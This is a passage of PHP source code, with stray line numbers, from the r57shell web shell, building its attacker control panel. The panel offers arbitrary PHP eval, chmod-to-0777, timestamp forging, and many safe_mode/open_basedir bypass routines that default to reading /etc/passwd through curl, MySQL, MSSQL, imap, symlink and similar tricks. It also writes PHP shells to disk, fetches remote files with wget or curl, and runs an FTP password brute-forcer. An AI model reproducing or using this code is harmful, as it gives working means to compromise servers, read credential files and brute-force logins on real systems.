<option value="2006">2007</option>
6081
6082
<option value="2006">2008</option>
6083
6084
<option value="2006">2009</option>
6085
6086
<option value="2006">2010</option>
6087
6088
</select>'
6089
6090
.ws(4)."<b>Hour".$arrow."</b>"
6091
6092
.'
6093
6094
<select name="chasi" size="1">
6095
6096
<option value="01">01</option>
6097
6098
<option value="02">02</option>
6099
6100
<option value="03">03</option>
6101
6102
<option value="04">04</option>
6103
6104
<option value="05">05</option>
6105
6106
<option value="06">06</option>
6107
6108
<option value="07">07</option>
6109
6110
<option value="08">08</option>
6111
6112
<option value="09">09</option>
6113
6114
<option value="10">10</option>
6115
6116
<option value="11">11</option>
6117
6118
<option value="12">12</option>
6119
6120
<option value="13">13</option>
6121
6122
<option value="14">14</option>
6123
6124
<option value="15">15</option>
6125
6126
<option value="16">16</option>
6127
6128
<option value="17">17</option>
6129
6130
<option value="18">18</option>
6131
6132
<option value="19">19</option>
6133
6134
<option value="20">20</option>
6135
6136
<option value="21">21</option>
6137
6138
<option value="22">22</option>
6139
6140
<option value="23">23</option>
6141
6142
<option value="24">24</option>
6143
6144
</select>'
6145
6146
.ws(4)."<b>Minute".$arrow."</b>"
6147
6148
.'
6149
6150
<select name="minutes" size="1">
6151
6152
<option value="01">1</option>
6153
6154
<option value="02">2</option>
6155
6156
<option value="03">3</option>
6157
6158
<option value="04">4</option>
6159
6160
<option value="05">5</option>
6161
6162
<option value="06">6</option>
6163
6164
<option value="07">7</option>
6165
6166
<option value="08">8</option>
6167
6168
<option value="09">9</option>
6169
6170
<option value="10">10</option>
6171
6172
<option value="11">11</option>
6173
6174
<option value="12">12</option>
6175
6176
<option value="13">13</option>
6177
6178
<option value="14">14</option>
6179
6180
<option value="15">15</option>
6181
6182
<option value="16">16</option>
6183
6184
<option value="17">17</option>
6185
6186
<option value="18">18</option>
6187
6188
<option value="19">19</option>
6189
6190
<option value="20">20</option>
6191
6192
<option value="21">21</option>
6193
6194
<option value="22">22</option>
6195
6196
<option value="23">23</option>
6197
6198
<option value="24">24</option>
6199
6200
<option value="25">25</option>
6201
6202
<option value="26">26</option>
6203
6204
<option value="27">27</option>
6205
6206
<option value="28">28</option>
6207
6208
<option value="29">29</option>
6209
6210
<option value="30">30</option>
6211
6212
<option value="31">31</option>
6213
6214
<option value="32">32</option>
6215
6216
<option value="33">33</option>
6217
6218
<option value="34">34</option>
6219
6220
<option value="35">35</option>
6221
6222
<option value="36">36</option>
6223
6224
<option value="37">37</option>
6225
6226
<option value="38">38</option>
6227
6228
<option value="39">39</option>
6229
6230
<option value="40">40</option>
6231
6232
<option value="41">41</option>
6233
6234
<option value="42">42</option>
6235
6236
<option value="43">43</option>
6237
6238
<option value="44">44</option>
6239
6240
<option value="45">45</option>
6241
6242
<option value="46">46</option>
6243
6244
<option value="47">47</option>
6245
6246
<option value="48">48</option>
6247
6248
<option value="49">49</option>
6249
6250
<option value="50">50</option>
6251
6252
<option value="51">51</option>
6253
6254
<option value="52">52</option>
6255
6256
<option value="53">53</option>
6257
6258
<option value="54">54</option>
6259
6260
<option value="55">55</option>
6261
6262
<option value="56">56</option>
6263
6264
<option value="57">57</option>
6265
6266
<option value="58">58</option>
6267
6268
<option value="59">59</option>
6269
6270
</select>'
6271
6272
.ws(4)."<b>Second".$arrow."</b>"
6273
6274
.'
6275
6276
<select name="second" size="1">
6277
6278
<option value="01">1</option>
6279
6280
<option value="02">2</option>
6281
6282
<option value="03">3</option>
6283
6284
<option value="04">4</option>
6285
6286
<option value="05">5</option>
6287
6288
<option value="06">6</option>
6289
6290
<option value="07">7</option>
6291
6292
<option value="08">8</option>
6293
6294
<option value="09">9</option>
6295
6296
<option value="10">10</option>
6297
6298
<option value="11">11</option>
6299
6300
<option value="12">12</option>
6301
6302
<option value="13">13</option>
6303
6304
<option value="14">14</option>
6305
6306
<option value="15">15</option>
6307
6308
<option value="16">16</option>
6309
6310
<option value="17">17</option>
6311
6312
<option value="18">18</option>
6313
6314
<option value="19">19</option>
6315
6316
<option value="20">20</option>
6317
6318
<option value="21">21</option>
6319
6320
<option value="22">22</option>
6321
6322
<option value="23">23</option>
6323
6324
<option value="24">24</option>
6325
6326
<option value="25">25</option>
6327
6328
<option value="26">26</option>
6329
6330
<option value="27">27</option>
6331
6332
<option value="28">28</option>
6333
6334
<option value="29">29</option>
6335
6336
<option value="30">30</option>
6337
6338
<option value="31">31</option>
6339
6340
<option value="32">32</option>
6341
6342
<option value="33">33</option>
6343
6344
<option value="34">34</option>
6345
6346
<option value="35">35</option>
6347
6348
<option value="36">36</option>
6349
6350
<option value="37">37</option>
6351
6352
<option value="38">38</option>
6353
6354
<option value="39">39</option>
6355
6356
<option value="40">40</option>
6357
6358
<option value="41">41</option>
6359
6360
<option value="42">42</option>
6361
6362
<option value="43">43</option>
6363
6364
<option value="44">44</option>
6365
6366
<option value="45">45</option>
6367
6368
<option value="46">46</option>
6369
6370
<option value="47">47</option>
6371
6372
<option value="48">48</option>
6373
6374
<option value="49">49</option>
6375
6376
<option value="50">50</option>
6377
6378
<option value="51">51</option>
6379
6380
<option value="52">52</option>
6381
6382
<option value="53">53</option>
6383
6384
<option value="54">54</option>
6385
6386
<option value="55">55</option>
6387
6388
<option value="56">56</option>
6389
6390
<option value="57">57</option>
6391
6392
<option value="58">58</option>
6393
6394
<option value="59">59</option>
6395
6396
</select>'
6397
6398
.in('hidden','cmd',0,'touch')
6399
6400
.in('hidden','dir',0,$dir)
6401
6402
.ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6403
6404
echo $te.'</div>'.$table_end1.$fe;
6405
6406
}
6407
6408
$select='';
6409
6410
if(@function_exists('chmod')){$select .= "<option value=mod>CHMOD</option>";}
6411
6412
if(@function_exists('chown')){$select .= "<option value=own>CHOWN</option>";}
6413
6414
if(@function_exists('chgrp')){$select .= "<option value=grp>CHGRP</option>";}
6415
6416
if($unix &&$select){
6417
6418
echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id6').$table_up2.div('id6').$ts;
6419
6420
echo @sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','param1',55,(($_POST['param1'])?($_POST['param1']):($dir."/r57shell.php"))).ws(2)."<b>".$lang[$language.'_text68'].$arrow."</b>"."<select name=what>".$select."</select>".ws(4).in('text','param2 title="'.$lang[$language.'_text71'].'"',10,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6421
6422
echo $te.'</div>'.$table_end1.$fe;
6423
6424
}
6425
6426
if(!$safe_mode){
6427
6428
$aliases2 = '';
6429
6430
foreach ($aliases as $alias_name=>$alias_cmd)
6431
6432
{
6433
6434
$aliases2 .= "<option>$alias_name</option>";
6435
6436
}
6437
6438
echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id7').$table_up2.div('id7').$ts;
6439
6440
echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
6441
6442
echo $te.'</div>'.$table_end1.$fe;
6443
6444
}
6445
6446
echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id8').$table_up2.div('id8').$ts;
6447
6448
echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6449
6450
echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
6451
6452
echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
6453
6454
echo $te.'</div>'.$table_end1.$fe;
6455
6456
if(!$safe_mode &&$unix){
6457
6458
echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id9').$table_up2.div('id9').$ts;
6459
6460
echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
6461
6462
echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
6463
6464
echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
6465
6466
echo $te.'</div>'.$table_end1.$fe;
6467
6468
}
6469
6470
echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id10').$table_up2.$font;
6471
6472
echo "<div align=center>".div('id10')."<textarea name=php_eval cols=100 rows=10>";
6473
6474
echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");\r\n//file_get_content(\"/etc/passwd\");"));
6475
6476
echo "</textarea>";
6477
6478
echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
6479
6480
echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
6481
6482
echo "</div></div></font>";
6483
6484
echo $table_end1.$fe;
6485
6486
if($safe_mode ||$open_basedir)
6487
6488
{
6489
6490
echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
6491
6492
echo "<table class=table1 width=100% align=center>";
6493
6494
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6495
6496
echo $te.'</div>'.$table_end1.$fe;
6497
6498
}
6499
6500
if(($safe_mode ||$open_basedir) &&$curl_on &&@version_compare(@phpversion(),"5.2.0")<=0)
6501
6502
{
6503
6504
echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id12').$table_up2.div('id12').$ts;
6505
6506
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6507
6508
echo $te.'</div>'.$table_end1.$fe;
6509
6510
}
6511
6512
if(($safe_mode ||$open_basedir) &&$mysql_on)
6513
6514
{
6515
6516
echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id13').$table_up2.div('id13').$ts;
6517
6518
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
6519
6520
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6521
6522
echo $te.'</div>'.$table_end1.$fe;
6523
6524
}
6525
6526
if(($safe_mode ||$open_basedir) &&$mssql_on)
6527
6528
{
6529
6530
echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id14').$table_up2.div('id14').$ts;
6531
6532
echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
6533
6534
echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6535
6536
echo $te.'</div>'.$table_end1.$fe;
6537
6538
}
6539
6540
if(($safe_mode ||$open_basedir) &&$unix &&@function_exists('mb_send_mail') &&@version_compare(@phpversion(),"5.2.0")<=0){
6541
6542
echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id15').$table_up2.div('id15').$ts;
6543
6544
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6545
6546
echo $te.'</div>'.$table_end1.$fe;
6547
6548
}
6549
6550
if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_list') &&@version_compare(@phpversion(),"5.2.0")<=0){
6551
6552
echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id20').$table_up2.div('id20').$ts;
6553
6554
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6555
6556
echo $te.'</div>'.$table_end1.$fe;
6557
6558
}
6559
6560
if(($safe_mode ||$open_basedir) &&@function_exists('imap_open') &&@function_exists('imap_body') &&@version_compare(@phpversion(),"5.2.0")<=0){
6561
6562
echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id21').$table_up2.div('id21').$ts;
6563
6564
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6565
6566
echo $te.'</div>'.$table_end1.$fe;
6567
6568
}
6569
6570
if(($safe_mode ||$open_basedir) &&@function_exists('copy') &&@version_compare(@phpversion(),"5.2.0")<=0)
6571
6572
{
6573
6574
echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id22').$table_up2.div('id22').$ts;
6575
6576
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
6577
6578
echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6579
6580
echo $te.'</div>'.$table_end1.$fe;
6581
6582
}
6583
6584
if(($safe_mode ||$open_basedir) &&@function_exists('ini_restore') &&@version_compare(@phpversion(),"5.2.0")<=0){
6585
6586
echo $fs.$table_up1.div_title($lang[$language.'_text120'],'id23').$table_up2.div('id23').$ts;
6587
6588
echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test9_file',96,(!empty($_POST['test9_file'])?($_POST['test9_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test9').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6589
6590
echo $te.'</div>'.$table_end1.$fe;
6591
6592
}
6593
6594
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.0.0")<0){
6595
6596
echo $fs.$table_up1.div_title($lang[$language.'_text121'],'id24').$table_up2.div('id24').$ts;
6597
6598
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test10_file',96,(!empty($_POST['test10_file'])?($_POST['test10_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test10').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6599
6600
echo $te.'</div>'.$table_end1.$fe;
6601
6602
}
6603
6604
if(($safe_mode ||$open_basedir) &&@function_exists('glob') &&@version_compare(@phpversion(),"5.2.2")<=0){
6605
6606
echo $fs.$table_up1.div_title($lang[$language.'_text122'],'id19').$table_up2.div('id19').$ts;
6607
6608
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',96,(!empty($_POST['test18_file'])?($_POST['test18_file']):($dir))).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6609
6610
echo $te.'</div>'.$table_end1.$fe;
6611
6612
}
6613
6614
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)
6615
6616
{
6617
6618
echo $fs.$table_up1.div_title($lang[$language.'_text130'],'id25').$table_up2.div('id25').$ts;
6619
6620
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test11_file',96,(!empty($_POST['test11_file'])?($_POST['test11_file']):("/tmp/test.zip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test11').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6621
6622
echo $te.'</div>'.$table_end1.$fe;
6623
6624
}
6625
6626
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)
6627
6628
{
6629
6630
echo $fs.$table_up1.div_title($lang[$language.'_text123'],'id26').$table_up2.div('id26').$ts;
6631
6632
echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test12_file',96,(!empty($_POST['test12_file'])?($_POST['test12_file']):("/tmp/test.bzip"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test12').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6633
6634
echo $te.'</div>'.$table_end1.$fe;
6635
6636
}
6637
6638
if(($safe_mode ||$open_basedir) &&@function_exists('error_log') &&@version_compare(@phpversion(),"5.2.2")<=0)
6639
6640
{
6641
6642
echo $fs.$table_up1.div_title($lang[$language.'_text124'],'id27').$table_up2.div('id27').$ts;
6643
6644
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test13_file2',96,(!empty($_POST['test13_file2'])?($_POST['test13_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test13'));
6645
6646
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test13_file1',96,(!empty($_POST['test13_file1'])?($_POST['test13_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
6647
6648
echo $te.'</div>'.$table_end1.$fe;
6649
6650
}
6651
6652
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.2")<=0)
6653
6654
{
6655
6656
echo $fs.$table_up1.div_title($lang[$language.'_text126'],'id28').$table_up2.div('id28').$ts;
6657
6658
echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test14_file2',96,(!empty($_POST['test14_file2'])?($_POST['test14_file2']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test14'));
6659
6660
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test14_file1',96,(!empty($_POST['test14_file1'])?($_POST['test14_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
6661
6662
echo $te.'</div>'.$table_end1.$fe;
6663
6664
}
6665
6666
if(($safe_mode ||$open_basedir) &&@function_exists('readfile') &&@version_compare(@phpversion(),"5.2.2")<=0)
6667
6668
{
6669
6670
echo $fs.$table_up1.div_title($lang[$language.'_text127'],'id29').$table_up2.div('id29').$ts;
6671
6672
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test15_file2',96,(!empty($_POST['test15_file2'])?($_POST['test15_file2']):($dir."/shell.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test15'));
6673
6674
echo sr(15,"<b>".$lang[$language.'_text125'].$arrow."</b>",in('text','test15_file1',96,(!empty($_POST['test15_file1'])?($_POST['test15_file1']):("<? phpinfo(); ?>"))).ws(4).in('submit','submit',0,$lang[$language.'_butt10']));
6675
6676
echo $te.'</div>'.$table_end1.$fe;
6677
6678
}
6679
6680
if(($safe_mode ||$open_basedir) &&@version_compare(@phpversion(),"5.2.4")<=0)
6681
6682
{
6683
6684
echo $fs.$table_up1.div_title($lang[$language.'_text129'],'id16').$table_up2.div('id16').$ts;
6685
6686
echo sr(15,"<b>".$lang[$language.'_text65']." ".$lang[$language.'_text59'].$arrow."</b>",in('text','test16_file',96,(!empty($_POST['test16_file'])?($_POST['test16_file']):($dir."/test.php"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test16').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
6687
6688
echo $te.'</div>'.$table_end1.$fe;
6689
6690
}
6691
6692
if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0)
6693
6694
{
6695
6696
echo $table_up1.div_title($lang[$language.'_text131'],'id17').$table_up2.div('id17').$ts;
6697
6698
echo "<tr><td valign=top width=70%>".$ts;
6699
6700
echo sr(20,"<b>".$lang[$language.'_text30'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
6701
6702
echo $te."</td><td valign=top width=30%>".$ts;
6703
6704
echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_2').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
6705
6706
echo $te."</td></tr>";
6707
6708
echo $te.'</div>'.$table_end1;
6709
6710
}
6711
6712
if(($safe_mode ||$open_basedir) &&@function_exists('symlink') &&@version_compare(@phpversion(),"5.2.2")<=0)
6713
6714
{
6715
6716
echo $table_up1.div_title($lang[$language.'_text132'],'id18').$table_up2.div('id18').$ts;
6717
6718
echo "<tr><td valign=top width=70%>".$ts;
6719
6720
echo sr(20,"<b>".$lang[$language.'_text4'].$arrow."</b>",$fs.in('text','test17_file',60,(!empty($_POST['test17_file'])?($_POST['test17_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_1').in('submit','submit',0,$lang[$language.'_text136']).$fe);
6721
6722
echo $te."</td><td valign=top width=30%>".$ts;
6723
6724
echo sr(0,"",$fs.in('hidden','dir',0,$dir).in('hidden','cmd',0,'test17_3').in('submit','submit',0,$lang[$language.'_butt8']).$fe);
6725
6726
echo $te."</td></tr>";
6727
6728
echo $te.'</div>'.$table_end1;
6729
6730
}
6731
6732
if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){
6733
6734
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
6735
6736
echo $table_up1.div_title($lang[$language.'_text5'],'id30').$table_up2.div('id30').$ts;
6737
6738
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile0',85,''));
6739
6740
echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
6741
6742
echo $te.'</div>'.$table_end1.$fe;
6743
6744
}
6745
6746
if((!@function_exists('ini_get')) ||@ini_get('file_uploads')){
6747
6748
echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
6749
6750
echo $table_up1.div_title('Multy '.$lang[$language.'_text5'],'id34').$table_up2.div('id34').$ts;
6751
6752
echo "<tr><td valign=top width=50%>".$ts;
6753
6754
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile1',35,''));
6755
6756
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile2',35,''));
6757
6758
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile3',35,''));
6759
6760
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile4',35,''));
6761
6762
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile5',35,''));
6763
6764
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile6',35,''));
6765
6766
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile7',35,''));
6767
6768
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile8',35,''));
6769
6770
echo $te."</td><td valign=top width=50%>".$ts;
6771
6772
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile9',35,''));
6773
6774
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile10',35,''));
6775
6776
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile11',35,''));
6777
6778
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile12',35,''));
6779
6780
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile13',35,''));
6781
6782
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile14',35,''));
6783
6784
echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile15',35,''));
6785
6786
echo sr(15,'',in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
6787
6788
echo $te."</td></tr>";
6789
6790
echo $te.'</div>'.$table_end1.$fe;
6791
6792
}
6793
6794
$select='';
6795
6796
if((!@function_exists('ini_get')) ||(@ini_get('allow_url_fopen') &&@function_exists('fopen'))){$select = "<option value=\"fopen\">fopen</option>";}
6797
6798
if(!$safe_mode){
6799
6800
if(which('wget')){$select .= "<option value=\"wget\">wget</option>";}
6801
6802
if(which('fetch')){$select .= "<option value=\"fetch\">fetch</option>";}
6803
6804
if(which('lynx')){$select .= "<option value=\"lynx\">lynx</option>";}
6805
6806
if(which('links')){$select .= "<option value=\"links\">links</option>";}
6807
6808
if(which('curl')){$select .= "<option value=\"curl\">curl</option>";}
6809
6810
if(which('GET')){$select .= "<option value=\"GET\">GET</option>";}
6811
6812
}
6813
6814
if($select){
6815
6816
echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id31').$table_up2.div('id31').$ts;
6817
6818
echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\">".$select
6819
6820
."</select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
6821
6822
echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
6823
6824
echo $te.'</div>'.$table_end1.$fe;
6825
6826
}
6827
6828
echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id32').$table_up2.div('id32').$ts;
6829
6830
echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
6831
6832
$arh = $lang[$language.'_text92'];
6833
6834
if(@function_exists('gzcompress')) {$arh .= in('radio','compress',0,'zip').' zip';}
6835
6836
if(@function_exists('gzencode'))   {$arh .= in('radio','compress',0,'gzip').' gzip';}
6837
6838
if(@function_exists('bzcompress')) {$arh .= in('radio','compress',0,'bzip').' bzip';}
6839
6840
echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
6841
6842
echo $te.'</div>'.$table_end1.$fe;
6843
6844
if(@function_exists("ftp_connect")){
6845
6846
echo $table_up1.div_title($lang[$language.'_text93'],'id33').$table_up2.div('id33').$ts."<tr>".$fs."<td valign=top width=33%>".$ts;
6847
6848
echo "<font face=Verdana size=-2><b><div align=center id='n'>".$lang[$language.'_text94']."</div></b></font>";
6849
6850
echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',20,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').in('hidden','dir',0,$dir));
6851
6852
echo sr(25,"",in('radio','brute_method',0,'passwd',1)."<font face=Verdana size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
6853
6854
echo sr(25,"",in('checkbox','reverse id=reverse',0,'1',1).$lang[$language.'_text101']);
6855
6856
echo sr(25,"",in('radio','brute_method',0,'dic',0).$lang[$language.'_text135']);
6857
6858
echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',0,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("root"))));
6859
6860
echo sr(25,"<b>".$lang[$language.'_text135'].$arrow."</b>",in('text','dictionary',0,(!empty($_POST['dictionary'])?($_POST['dictionary']):($dir.'/passw.dic'))));
6861
6862
